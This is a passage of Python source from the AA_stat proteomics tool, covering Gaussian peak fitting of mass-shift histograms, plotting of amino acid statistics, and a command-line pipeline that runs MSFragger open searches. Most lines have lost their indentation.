to_fit = df.loc[loc, shifts] * 1e6 / df.loc[loc, params_dict['calculated_mass_column']]
unit = 'ppm'
elif params_dict['calibration'] == 'gauss_frequency':
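        # Orbitrap-style transform: resonant frequency scales as 1 / sqrt(m/z),
        # so mass errors are nearly constant in frequency units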
freq_measured = 1e6 / np.sqrt(utils.measured_mz_series(df, params_dict))
freq_calculated = 1e6 / np.sqrt(utils.calculated_mz_series(df, params_dict))
to_fit = (freq_measured - freq_calculated).loc[loc]
unit = 'freq. units'
if mask is not None:
to_fit = to_fit.loc[mask]
logger.debug('Returning a %s fittable series for a %s dataframe with a %s mask.', to_fit.shape, df.shape,
mask.shape if mask is not None else None)
return to_fit, unit
def get_cluster_masks(filtered_clusters, clustering, df, to_fit, params_dict):
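    # partition the RT axis: each cluster gets everything from the previous boundary
    # up to the midpoint between its own span and the next cluster's span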
all_rt = df[params_dict['rt_column']]
time_spans = {i: cluster_time_span(clustering, i, df, to_fit, params_dict) for i in filtered_clusters}
sorted_clusters = sorted(filtered_clusters, key=time_spans.get) # sorts by span start
i = 0
prev = all_rt.min()
masks = {}
while i < len(sorted_clusters):
cur_end = time_spans[sorted_clusters[i]][1]
if i == len(sorted_clusters) - 1:
next_point = all_rt.max() + 1
else:
next_start = time_spans[sorted_clusters[i + 1]][0]
next_point = (cur_end + next_start) / 2
logger.debug('Time span %.1f - %.1f assigned to cluster %s', prev, next_point, sorted_clusters[i])
masks[sorted_clusters[i]] = (all_rt >= prev) & (all_rt < next_point)
i += 1
prev = next_point
assigned_masks = [masks[c] for c in filtered_clusters]
return assigned_masks
def smooth(y, window_size=15, power=5):
"""
Smoothes function.
Paramenters
-----------
y : array-like
function to smooth.
window_size : int
Smothing window.
power : int
Power of smothing function.
Returns
-------
Smoothed function
"""
y_smooth = savgol_filter(y, window_size, power)
return y_smooth
def gauss(x, a, x0, sigma):
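    # Gaussian with total area `a` centered at `x0`:
    # a / (sigma * sqrt(2 * pi)) * exp(-(x - x0)**2 / (2 * sigma**2))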
with warnings.catch_warnings():
warnings.simplefilter("ignore")
return a / sigma / np.sqrt(2 * np.pi) * np.exp(-(x - x0) * (x - x0) / (2 * sigma ** 2))
def gauss_fitting(center_y, x, y):
"""
Fits with Gauss function
`center_y` - starting point for `a` parameter of gauss
`x` numpy array of mass shifts
`y` numpy array of number of psms in this mass shifts
"""
mean = (x * y).sum() / y.sum()
sigma = np.sqrt((y * (x - mean) ** 2).sum() / y.sum())
a = center_y * sigma * np.sqrt(2 * np.pi)
try:
popt, pcov = curve_fit(gauss, x, y, p0=(a, mean, sigma))
perr = np.sqrt(np.diag(pcov))
return popt, perr
except (RuntimeError, TypeError):
return None, None
def fit_worker(args):
return fit_batch_worker(*args)
def fit_batch_worker(out_path, batch_size, xs, ys, half_window, height_error, sigma_error):
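    # xs and ys are concatenations of equal-sized windows (2 * half_window + 1 points
    # each); `center` below indexes the apex of the i-th window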
shape = int(math.ceil(np.sqrt(batch_size)))
figsize = (shape * 3, shape * 4)
plt.figure(figsize=figsize)
plt.tight_layout()
logger.debug('Created a figure with size %s', figsize)
poptpvar = []
for i in range(batch_size):
center = i * (2 * half_window + 1) + half_window
x = xs[center - half_window: center + half_window + 1]
y = ys[center - half_window: center + half_window + 1]
popt, perr = gauss_fitting(ys[center], x, y)
plt.subplot(shape, shape, i + 1)
if popt is None:
label = 'NO FIT'
else:
if (x[0] <= popt[1] and popt[1] <= x[-1] and perr[0] / popt[0] < height_error
and perr[2] / popt[2] < sigma_error):
label = 'PASSED'
poptpvar.append(np.concatenate([popt, perr]))
plt.vlines(popt[1] - 3 * popt[2], 0, ys[center], label='3sigma interval')
plt.vlines(popt[1] + 3 * popt[2], 0, ys[center])
else:
label = 'FAILED'
plt.plot(x, y, 'b+:', label=label)
if label != 'NO FIT':
plt.scatter(x, gauss(x, *popt), label='Gaussian fit\n $\\sigma$ = {:.4f}'.format(popt[2]))
plt.legend()
plt.title("{0:.3f}".format(xs[center]))
plt.grid(True)
logger.debug('Fit done. Saving %s...', out_path)
plt.savefig(out_path)
plt.close()
return poptpvar
def fit_peaks(data, args, params_dict):
"""
Finds Gauss-like peaks in mass shift histogram.
Parameters
----------
data : DataFRame
A DF with all (non-filtered) results of open search.
args: argsparse
params_dict : dict
Parameters dict.
"""
logger.info('Performing Gaussian fit...')
fit_batch = params_dict['fit batch']
half_window = int(params_dict['window'] / 2) + 1
hist = np.histogram(data.loc[data['is_decoy'] == False, params_dict['mass_shifts_column']], bins=params_dict['bins'])
hist_y = smooth(hist[0], window_size=params_dict['window'], power=5)
hist_x = 0.5 * (hist[1][:-1] + hist[1][1:])
    # local maxima of the smoothed histogram are candidate peaks
    loc_max_candidates_ind = argrelextrema(hist_y, np.greater_equal)[0]
    # minimum peak height: twice the approximate noise level,
    # estimated as the median of all bins with more than one count
    min_height = 2 * np.median(hist[0][hist[0] > 1])
loc_max_candidates_ind = loc_max_candidates_ind[hist_y[loc_max_candidates_ind] >= min_height]
if not loc_max_candidates_ind.size:
logger.info('No peaks found for fit.')
        return np.array([])  # no peaks: return an empty array, matching the normal return type
height_error = params_dict['max_deviation_height']
sigma_error = params_dict['max_deviation_sigma']
logger.debug('Candidates for fit: %s', len(loc_max_candidates_ind))
nproc = int(math.ceil(len(loc_max_candidates_ind) / fit_batch))
maxproc = params_dict['processes']
if maxproc > 0:
nproc = min(nproc, maxproc)
if nproc > 1:
arguments = []
logger.debug('Splitting the fit into %s batches...', nproc)
n = min(nproc, mp.cpu_count())
logger.debug('Creating a pool of %s processes.', n)
pool = mp.Pool(n)
for proc in range(nproc):
xlist = [hist_x[center - half_window: center + half_window + 1]
for center in loc_max_candidates_ind[proc * fit_batch: (proc + 1) * fit_batch]]
xs = np.concatenate(xlist)
ylist = [hist[0][center - half_window: center + half_window + 1]
for center in loc_max_candidates_ind[proc * fit_batch: (proc + 1) * fit_batch]]
ys = np.concatenate(ylist)
out = os.path.join(args.dir, 'gauss_fit_{}.pdf'.format(proc + 1))
arguments.append((out, len(xlist), xs, ys, half_window, height_error, sigma_error))
res = pool.map_async(fit_worker, arguments)
poptpvar_list = res.get()
# logger.debug(poptpvar_list)
pool.close()
pool.join()
logger.debug('Workers done.')
poptpvar = [p for r in poptpvar_list for p in r]
else:
xs = np.concatenate([hist_x[center - half_window: center + half_window + 1]
for center in loc_max_candidates_ind])
ys = np.concatenate([hist[0][center - half_window: center + half_window + 1]
for center in loc_max_candidates_ind])
poptpvar = fit_batch_worker(os.path.join(args.dir, 'gauss_fit.pdf'),
len(loc_max_candidates_ind), xs, ys, half_window, height_error, sigma_error)
logger.debug('Returning from fit_peaks. Array size is %d.', len(poptpvar))
return np.array(poptpvar)
_Mkstyle = matplotlib.markers.MarkerStyle
_marker_styles = [_Mkstyle('o', fillstyle='full'), (_Mkstyle('o', fillstyle='left'), _Mkstyle('o', fillstyle='right')),
(_Mkstyle('o', fillstyle='top'), _Mkstyle('o', fillstyle='bottom')), (_Mkstyle(8), _Mkstyle(9)),
(_Mkstyle('v'), _Mkstyle('^')), (_Mkstyle('|'), _Mkstyle('_')), (_Mkstyle('+'), _Mkstyle('x'))]
def _generate_pair_markers():
'''Produce style & color pairs for localization markers (except the main one).'''
for i in [3, 4, 5, 0, 1, 2]:
for ms in _marker_styles[1:]:
yield colors[i], ms
def _get_max(arr):
values = [x for x in arr if x is not None]
if values:
return max(values)
return 0
def plot_figure(ms_label, ms_counts, left, right, params_dict, save_directory, localizations=None, sumof=None):
"""
Plots amino acid spatistics.
Parameters
----------
ms_label : str
Mass shift in string format.
ms_counts : int
Number of peptides in a mass shift.
left : list
Amino acid statistics data [[values], [errors]]
right : list
Amino acid frequences in peptides
params_dict : dict
Parameters dict.
save_directory: str
Saving directory.
localizations : Counter
Localization counter using ms/ms level.
sumof : List
List of str tuples for constituent mass shifts.
"""
b = 0.1 # shift in bar plots
width = 0.2 # for bar plots
labels = params_dict['labels']
labeltext = ms_label + ' Da mass shift,\n' + str(ms_counts) + ' peptides'
x = np.arange(len(labels))
distributions = left[0]
errors = left[1]
fig, ax_left = plt.subplots()
fig.set_size_inches(params_dict['figsize'])
ax_left.bar(x - b, distributions.loc[labels],
yerr=errors.loc[labels], width=width, color=colors[2], linewidth=0)
ax_left.set_ylabel('Relative AA abundance', color=colors[2])
ax_left.set_xticks(x)
ax_left.set_xticklabels(labels)
ax_left.hlines(1, -1, x[-1] + 1, linestyles='dashed', color=colors[2])
ax_right = ax_left.twinx()
ax_right.bar(x + b, right, width=width, linewidth=0, color=colors[0])
ax_right.set_ylim(0, 125)
ax_right.set_yticks(np.arange(0, 120, 20))
ax_right.set_ylabel('Peptides with AA, %', color=colors[0])
ax_left.spines['left'].set_color(colors[2])
ax_right.spines['left'].set_color(colors[2])
ax_left.spines['right'].set_color(colors[0])
ax_right.spines['right'].set_color(colors[0])
ax_left.tick_params('y', colors=colors[2])
ax_right.tick_params('y', colors=colors[0])
pright = matplotlib.lines.Line2D([], [], marker=None, label=labeltext, alpha=0)
ax_left.set_xlim(-1, x[-1] + 1)
ax_left.set_ylim(0, distributions.loc[labels].max() * 1.4)
logger.debug('Localizations for %s figure: %s', ms_label, localizations)
if localizations:
ax3 = ax_left.twinx()
ax3.spines['right'].set_position(('axes', 1.1))
ax3.set_frame_on(True)
ax3.patch.set_visible(False)
ax3.set_ylabel('Localization count', color=colors[3])
for sp in ax3.spines.values():
sp.set_visible(False)
ax3.spines['right'].set_visible(True)
ax3.spines['right'].set_color(colors[3])
ax3.tick_params('y', colors=colors[3])
# plot simple modifications (not sum) with the first style,
# then parts of sum
values = [localizations.get(key + '_' + ms_label) for key in labels]
maxcount = _get_max(values)
label_prefix = 'Location of '
ax3.scatter(x, values, marker=_marker_styles[0], color=colors[3], label=label_prefix + ms_label)
if isinstance(sumof, list):
for pair, (color, style) in zip(sumof, _generate_pair_markers()):
values_1 = [localizations.get(key + '_' + pair[0]) for key in labels]
maxcount = max(maxcount, _get_max(values_1))
ax3.scatter(x, values_1, marker=style[0], color=color, label=label_prefix + pair[0])
if pair[0] != pair[1]:
values_2 = [localizations.get(key + '_' + pair[1]) for key in labels]
if values_2:
maxcount = max(maxcount, _get_max(values_2))
ax3.scatter(x, values_2, marker=style[1], color=color, label=label_prefix + pair[1])
terms = {key for key in localizations if key[1:6] == '-term'}
# logger.debug('Found terminal localizations: %s', terms)
for t in terms:
label = '{} at {}: {}'.format(*reversed(t.split('_')), localizations[t])
p = ax3.plot([], [], label=label)[0]
p.set_visible(False)
pright.set_label(pright.get_label() + '\nNot localized: {}'.format(localizations.get('non-localized', 0)))
if maxcount:
ax3.legend(loc='upper left', ncol=2)
ax3.set_ylim(0, 1.4 * max(maxcount, 1))
ax_right.legend(handles=[pright], loc='upper right', edgecolor='dimgrey', fancybox=True, handlelength=0)
fig.tight_layout()
fig.savefig(os.path.join(save_directory, ms_label + '.png'), dpi=500)
fig.savefig(os.path.join(save_directory, ms_label + '.svg'))
plt.close()
def summarizing_hist(table, save_directory):
width = 0.8
fig, ax = plt.subplots(figsize=(len(table), 5))
ax.bar(range(len(table)), table.sort_values('mass shift')['# peptides in bin'],
color=colors[2], align='center', width=width)
ax.set_title('Peptides in mass shifts', fontsize=12)
ax.set_xlabel('Mass shift', fontsize=10)
ax.set_ylabel('Number of peptides')
ax.set_xlim((-1, len(table)))
ax.set_xticks(range(len(table)))
ax.set_xticklabels(table.sort_values('mass shift')['mass shift'].apply('{:.2f}'.format))
total = table['# peptides in bin'].sum()
vdist = table['# peptides in bin'].max() * 0.01
max_height = 0
for i, patch in enumerate(ax.patches):
current_height = patch.get_height()
if current_height > max_height:
max_height = current_height
ax.text(patch.get_x() + width / 2, current_height + vdist,
'{:>6.2%}'.format(table.at[table.index[i], '# peptides in bin'] / total),
fontsize=10, color='dimgrey', ha='center')
plt.ylim(0, max_height * 1.2)
plt.tight_layout()
plt.savefig(os.path.join(save_directory, 'summary.png')) # dpi=500
plt.savefig(os.path.join(save_directory, 'summary.svg'))
    plt.close()

# ==== end of AA_stat/stats.py ====
import subprocess
import os
import shutil
from . import AA_stat, utils, io
import argparse
import logging
import sys
"""
Created on Sun Jan 26 15:41:40 2020
@author: julia
"""
OS_PARAMS_DEFAULT = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'open_search.params')
logger = logging.getLogger(__name__)
DICT_AA = {
'add_G_glycine' : 'G',
'add_A_alanine' : 'A',
'add_S_serine' : 'S',
'add_P_proline' : 'P',
'add_V_valine' : 'V',
'add_T_threonine' : 'T',
'add_C_cysteine' : 'C',
'add_L_leucine' : 'L',
'add_I_isoleucine' : 'I',
'add_N_asparagine' : 'N',
'add_D_aspartic_acid' : 'D',
'add_Q_glutamine' : 'Q',
'add_K_lysine' : 'K',
'add_E_glutamic_acid' : 'E',
'add_M_methionine' : 'M',
'add_H_histidine' : 'H',
'add_F_phenylalanine' : 'F',
'add_R_arginine' : 'R',
'add_Y_tyrosine' : 'Y',
'add_W_tryptophan' : 'W',
'add_Cterm_peptide' : 'C-term',
'add_Nterm_peptide' : 'N-term',
}
def main():
pars = argparse.ArgumentParser()
    pars.add_argument('--params', help='CFG file with parameters. If not specified, AA_stat uses the default one. '
        'An example can be found at https://github.com/SimpleNumber/aa_stat', required=False)
pars.add_argument('--MSFragger', help='Path to MSFragger .jar file. '
'If not specified, MSFRAGGER environment variable is used.')
pars.add_argument('--dir', help='Directory to store the results. Default value is current directory.', default='.')
pars.add_argument('-v', '--verbosity', type=int, choices=range(4), default=1, help='Output verbosity.')
input_spectra = pars.add_mutually_exclusive_group(required=True)
input_spectra.add_argument('--mgf', nargs='+', help='MGF files to search.', default=None)
input_spectra.add_argument('--mzml', nargs='+', help='mzML files to search.', default=None)
    pars.add_argument('-db', '--fasta', help='FASTA file with decoys for open search. If not specified, the database '
        'from the included MSFragger parameters is used; it is expected to contain decoys. The default decoy prefix is "rev_".'
        ' If yours differs, do not forget to specify it in the AA_stat params file.')
pars.add_argument('--os-params', help='Custom open search parameters.')
pars.add_argument('-x', '--optimize-fixed-mods',
help='Run multiple searches, automatically determine which fixed modifications to apply.',
action='store_true', default=False)
    pars.add_argument('-s', '--skip', help='Skip the search if pepXML files already exist. If not specified, '
        'no steps are skipped. If specified without a value, the first step may be skipped. '
        'The value is the number of steps to skip. Only works with "-x".',
        nargs='?', default=0, const=1, type=int)
pars.add_argument('-je', '--java-executable', default='java')
pars.add_argument('-ja', '--java-args', default='')
args = pars.parse_args()
levels = [logging.WARNING, logging.INFO, logging.DEBUG, utils.INTERNAL]
logging.basicConfig(format='{levelname:>8}: {asctime} {message}',
datefmt='[%H:%M:%S]', level=levels[args.verbosity], style='{')
if not args.MSFragger:
args.MSFragger = os.environ.get('MSFRAGGER')
if not args.MSFragger:
logger.critical('Please specify --MSFragger or set MSFRAGGER environment variable.')
sys.exit(1)
logger.info("Starting MSFragger and AA_stat pipeline.")
spectra = args.mgf or args.mzml
spectra = [os.path.abspath(i) for i in spectra]
working_dir = args.dir
if args.optimize_fixed_mods:
logger.debug('Skipping up to %d steps.', args.skip)
step = 1
fix_mod_dict = {}
while True:
logger.info('Starting step %d.', step)
fig_data, aastat_table, locmod, data_dict, new_fix_mod_dict, var_mod_dict = run_step_os(
spectra, 'os_step_{}'.format(step), working_dir, args, change_dict=fix_mod_dict, step=step)
if new_fix_mod_dict:
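                # accumulate masses: each recommended shift is relative to the
                # fixed modifications already applied on previous steps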
for k, v in new_fix_mod_dict.items():
fix_mod_dict.setdefault(k, 0.)
fix_mod_dict[k] += data_dict[v][0]
step += 1
else:
break
try:
if os.path.isfile(os.path.join(working_dir, 'report.html')):
logger.debug('Removing existing report.html.')
os.remove(os.path.join(working_dir, 'report.html'))
os.symlink(os.path.join('os_step_1', 'report.html'), os.path.join(working_dir, 'report.html'))
except Exception as e:
logger.debug('Can\'t create symlink to report: %s', e)
else:
logger.debug('Symlink created successfully.')
logger.info('Stopping after %d steps.', step)
else:
logger.info('Running one-shot search.')
folder_name = ''
run_step_os(spectra, folder_name, working_dir, args)
def get_pepxml(input_file, d=None):
initial = os.path.splitext(input_file)[0] + '.pepXML'
if d is None:
return initial
sdir, f = os.path.split(initial)
return os.path.join(d, f)
def run_os(java, jargs, spectra, msfragger, save_dir, parameters):
command = [java] + jargs + ['-jar', msfragger, parameters, *spectra]
logger.debug('Running command: %s', ' '.join(command))
retval = subprocess.call(command)
logger.debug('Subprocess returned %s', retval)
if retval:
logger.critical('MSFragger returned non-zero code %s. Exiting.', retval)
sys.exit(retval)
os.makedirs(save_dir, exist_ok=True)
for s in spectra:
pepxml = get_pepxml(s)
if os.path.normpath(os.path.dirname(pepxml)) != os.path.normpath(save_dir):
logger.debug('Moving %s to %s', pepxml, save_dir)
shutil.move(pepxml, get_pepxml(s, save_dir))
else:
logger.debug('No need to move pepXML file.')
def create_os_params(output, original=None, mass_shifts=None, fastafile=None):
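    # copy the template parameter file, overriding the database path and the
    # amino acid masses for any recommended fixed modifications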
original = original or OS_PARAMS_DEFAULT
with open(output, 'w') as new_params, open(original) as default:
for line in default:
key = line.split('=')[0].strip()
if key == 'database_name' and fastafile:
new_params.write('database_name = {}\n'.format(fastafile))
elif mass_shifts and DICT_AA.get(key) in mass_shifts:
aa = DICT_AA[key]
new_params.write(key + ' = ' + str(mass_shifts[aa]) + '\n')
else:
new_params.write(line)
def run_step_os(spectra, folder_name, working_dir, args, change_dict=None, step=None):
dir = os.path.abspath(os.path.join(working_dir, folder_name))
os.makedirs(dir, exist_ok=True)
os_params_path = os.path.abspath(os.path.join(working_dir, folder_name, 'os.params'))
create_os_params(os_params_path, args.os_params, change_dict, args.fasta)
pepxml_names = [get_pepxml(s, dir) for s in spectra]
run = True
if step is not None:
if step <= args.skip:
run = not all(os.path.isfile(f) for f in pepxml_names)
logger.debug('On step %d, need to run search: %s', step, run)
else:
logger.debug('Can\'t skip step %d, running.', step)
if run:
run_os(args.java_executable, args.java_args.split(), spectra, args.MSFragger, dir, os_params_path)
else:
logger.info('Skipping search.')
args.pepxml = pepxml_names
args.csv = None
args.dir = dir
params_dict = io.get_params_dict(args)
    return AA_stat.AA_stat(params_dict, args, step=step)

# ==== end of AA_stat/aa_search.py ====